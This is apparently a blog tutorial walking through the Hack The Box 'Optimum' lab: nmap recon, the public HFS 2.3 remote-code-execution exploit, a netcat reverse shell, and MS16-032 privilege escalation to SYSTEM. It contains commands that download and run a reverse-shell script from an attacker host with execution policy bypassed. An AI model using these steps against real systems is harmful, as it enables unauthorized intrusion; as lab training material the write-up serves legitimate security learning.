Introduction

This article is a step-by-step tutorial on exploiting the Optimum machine from Hack The Box (HTB). We demonstrate how to identify vulnerabilities and exploit them to gain unauthorized access and escalate privileges on a Windows Server 2012 machine.

HackTheBox Optimum Description

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.

Reasons Why Windows Server 2012 R2 Is No Longer Secure:

1. End of Support by Microsoft

  • Mainstream support ended: October 9, 2018
  • Extended support ended: October 10, 2023
  • This means:
    • No security updates
    • No bug fixes
    • No technical support
    • Newly discovered vulnerabilities are left unpatched

2. Unpatched Vulnerabilities

  • Once support ends, any zero-day exploits or publicly disclosed vulnerabilities are not addressed.
  • Tools like Metasploit may already contain known exploits for unpatched systems.
  • Systems become attractive targets for ransomware, lateral movement, and privilege escalation attacks.

3. Incompatibility with Modern Security Protocols

  • Lacks native support for:
    • TLS 1.3
    • Modern cipher suites
    • Credential Guard / Windows Defender Exploit Guard
  • Default crypto implementations are outdated, making secure communication harder.

4. Fails Compliance and Regulatory Standards

  • Outdated systems violate standards like:
    • PCI-DSS
    • HIPAA
    • NIST 800-53
  • Could result in penalties, audit failures, or insurance denials.

5. Unsupported Third-Party Software

  • Newer applications and security tools no longer support Server 2012 R2.
  • Antivirus, backup agents, and EDR tools may drop compatibility, leaving blind spots.

1. Introduction to the Machine

  • The target is a Windows Server 2012 machine named Optimum from Hack The Box.
  • The difficulty level is described as medium.

To properly resolve the machine hostname, the hosts file is edited.

  • Command: sudo nano /etc/hosts → adds 10.10.10.8 optimum.htb
    Web browser reveals a file sharing web interface similar to Dropbox.

2. Initial Reconnaissance

  • An Nmap scan reveals that only port 80 (HTTP) is open, running an HTTP File Server (HFS) 2.3.
  • The web interface resembles a simplified file-sharing service like Dropbox or Google Drive.
  • The goal is to find vulnerabilities due to the outdated server version.

Tool used: nmap to identify services

Command: nmap -sV -sC -Pn 10.10.10.8
Result: Only port 80 open with an HTTP File Server (HFS) visible.

3. Finding an Exploit

The server runs HTTP File Server 2.3. We look for known exploits using SearchSploit.

  • Command: searchsploit -w HFS 2.3
  • Found Exploits:
    • Python RCE: 39161.py
    • Text-based payload: 39160.txt
  • We select a Remote Code Execution (RCE) exploit in Python.
  • The exploit requires setting up a reverse shell connection back to the attacker.

4. Setting Up the Attack Environment

Downloaded and edited exploit to insert attacker’s IP and port.

  • Command: sudo nano 39161.py → changes callback IP to 10.10.14.16 and port to 443
    Setup file hosting with:
  • sudo cp nc.exe /var/www/html
  • sudo service apache2 start

5. Exploiting HFS for Remote Access

Command:

  • Listener: nc -nvlp 443
  • Python Server (optional): python3 -m http.server 80

Exploit Run:
python 39161.py 10.10.10.8 80
Successful RCE returns shell as user costas.

6. Privilege Escalation

Information about the system is retrieved:

  • Command: systeminfo
    Saved to file:
  • nano sysinfo.txt → paste system info
  • Used Windows Exploit Suggester:
    • sudo python windows-exploit-suggester.py --update
    • sudo python windows-exploit-suggester.py --database 2024.xml --systeminfo sysinfo.txt

7. Exploiting Privilege Escalation Vulnerabilities

Exploits selected based on system info (e.g., MS16-032). Exploit downloaded to victim and executed:

  • PowerShell Reverse Shell Prep:
Invoke-WebRequest -Uri http://10.10.14.16/shell.ps1 -OutFile shell.ps1
powershell -ExecutionPolicy Bypass -File shell.ps1

However, PowerShell execution fails on target, so binary method used instead.

Running the .exe exploit leads to full SYSTEM access.

  • Command: temp.exe
    Final validation with reading root.txt.

Key Learning Points

  1. Reconnaissance: Identify open ports and services using tools like Nmap.
  2. Vulnerability Research: Use tools like SearchSploit to find matching exploits for vulnerable services.
  3. Exploit Execution: Customize and run exploits, handle payload delivery, and troubleshoot issues.
  4. Privilege Escalation: Gather system information and use specialized tools to suggest and execute privilege escalation attacks.
  5. Post-Exploitation: Gain administrative control over the machine for full access.

You can also watch:

What Should You Do?

  1. Upgrade to Windows Server 2019 or 2022
  2. Migrate workloads to Azure or other cloud platforms
  3. Use Extended Security Updates (ESUs) – expensive and temporary (if still available)
  4. Isolate legacy systems if they cannot be replaced (network segmentation, ACLs)
,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles